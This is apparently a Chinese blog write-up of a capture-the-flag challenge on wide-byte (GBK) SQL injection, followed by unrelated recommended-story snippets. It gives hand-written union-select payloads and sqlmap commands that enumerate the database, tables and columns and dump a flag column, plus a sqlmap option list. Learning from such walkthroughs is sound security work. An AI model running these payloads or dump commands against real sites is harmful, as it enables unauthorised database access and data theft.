SQL注入

題目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
本題為寬字節(jié)注入,本文重點(diǎn)講解SQL注入相關(guān)方法港柜。


方法一:

1函喉、爆出數(shù)據(jù)庫(kù)

手工

id=%df%27%20union%20select%201,%20database()%23

工具

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db

2锁保、爆出表

手工

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23

工具

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables

3禁偎、爆出表的內(nèi)容

手工

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23
ctf4進(jìn)行16進(jìn)制轉(zhuǎn)換
id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

工具

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns

4杀怠、獲取列的內(nèi)容

手工

id=%df%27 union select 1,group_concat(flag) from ctf4%23

工具

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump

方法二:

sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag
--level 3 --risk 1 --thread 10

方法三:

python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db


關(guān)注黃色標(biāo)注恕汇,打開此文件可得腕唧。


關(guān)于手工注入:

后續(xù)參考:
1、SQL備忘錄
2瘾英、SQL Injection


關(guān)于sqlmap注入:

-h 顯示基礎(chǔ)的幫助消息并退出
-hh 顯示高級(jí)的幫助消息并退出
-u 目標(biāo)url
--thread 10 最大為10
--level 3 最大為5
--risk 3 最大為3
-a 檢索所有
--current-db 檢索當(dāng)前數(shù)據(jù)庫(kù)
--tables 枚舉數(shù)據(jù)庫(kù)表名
--columns 枚舉數(shù)據(jù)庫(kù)列名
--dump 輸出數(shù)據(jù)庫(kù)表的數(shù)據(jù)
--search 查找特定的列名枣接,表名或數(shù)據(jù)庫(kù)名,配合-D,-C,-T
-D 指定數(shù)據(jù)庫(kù)名
-T 指定數(shù)據(jù)庫(kù)表名
-C 指定數(shù)據(jù)庫(kù)列名
--common-tables 檢測(cè)常見的表名
--common-columns 檢測(cè)常見的列名

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末缺谴,一起剝皮案震驚了整個(gè)濱河市但惶,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌湿蛔,老刑警劉巖膀曾,帶你破解...
    沈念sama閱讀 216,544評(píng)論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異阳啥,居然都是意外死亡添谊,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門察迟,熙熙樓的掌柜王于貴愁眉苦臉地迎上來斩狱,“玉大人,你說我怎么就攤上這事扎瓶∷唬” “怎么了?”我有些...
    開封第一講書人閱讀 162,764評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵概荷,是天一觀的道長(zhǎng)秕岛。 經(jīng)常有香客問我,道長(zhǎng)误证,這世上最難降的妖魔是什么继薛? 我笑而不...
    開封第一講書人閱讀 58,193評(píng)論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮雷厂,結(jié)果婚禮上惋增,老公的妹妹穿的比我還像新娘。我一直安慰自己改鲫,他們只是感情好诈皿,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,216評(píng)論 6 388
  • 文/花漫 我一把揭開白布林束。 她就那樣靜靜地躺著,像睡著了一般稽亏。 火紅的嫁衣襯著肌膚如雪壶冒。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,182評(píng)論 1 299
  • 那天截歉,我揣著相機(jī)與錄音胖腾,去河邊找鬼骚腥。 笑死涝焙,一個(gè)胖子當(dāng)著我的面吹牛沃缘,可吹牛的內(nèi)容都是我干的练对。 我是一名探鬼主播,決...
    沈念sama閱讀 40,063評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼檩小,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼次泽!你這毒婦竟也來了望迎?” 一聲冷哼從身側(cè)響起壳嚎,我...
    開封第一講書人閱讀 38,917評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤桐智,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后烟馅,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體说庭,經(jīng)...
    沈念sama閱讀 45,329評(píng)論 1 310
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,543評(píng)論 2 332
  • 正文 我和宋清朗相戀三年郑趁,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了刊驴。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,722評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡穿撮,死狀恐怖缺脉,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情悦穿,我是刑警寧澤,帶...
    沈念sama閱讀 35,425評(píng)論 5 343
  • 正文 年R本政府宣布业踢,位于F島的核電站栗柒,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏知举。R本人自食惡果不足惜瞬沦,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,019評(píng)論 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望雇锡。 院中可真熱鬧逛钻,春花似錦、人聲如沸锰提。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至边坤,卻和暖如春名扛,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背茧痒。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評(píng)論 1 269
  • 我被黑心中介騙來泰國(guó)打工肮韧, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人旺订。 一個(gè)月前我還...
    沈念sama閱讀 47,729評(píng)論 2 368
  • 正文 我出身青樓弄企,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親区拳。 傳聞我的和親對(duì)象是個(gè)殘疾皇子桩蓉,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,614評(píng)論 2 353

推薦閱讀更多精彩內(nèi)容

  • 一、分類 可以有以下幾種不同的維度:維度一:基于注入點(diǎn)值的屬性 數(shù)字型 字符型維度二:基于注入點(diǎn)的位置 GET/P...
    ffx_01閱讀 1,741評(píng)論 0 0
  • MySQL 通過AppServ/wamp/xampp可以在windows系統(tǒng)中快速搭建出一個(gè)Apache+PHP+...
    ha9worm閱讀 485評(píng)論 0 0
  • 一劳闹、基礎(chǔ) 1. 定義 SQL注入是一種利用未過濾/未審核用戶輸入的攻擊方法(“緩存溢出”和這個(gè)不同)院究,意思就是讓應(yīng)...
    楠昭閱讀 549評(píng)論 2 3
  • 我們?cè)陂_發(fā)過程中不僅要保證業(yè)務(wù)功能的完整性,更要保障安全性.在剛從事工作時(shí),我并沒有關(guān)注一些安全性相關(guān)的知識(shí),工作...
    一笑yo閱讀 1,391評(píng)論 0 0
  • django要連接數(shù)據(jù)庫(kù),首先要下載MySQL-Python-1.2.3.win32-py2.7.exe(這里要說...
    Windy楊閱讀 185評(píng)論 0 0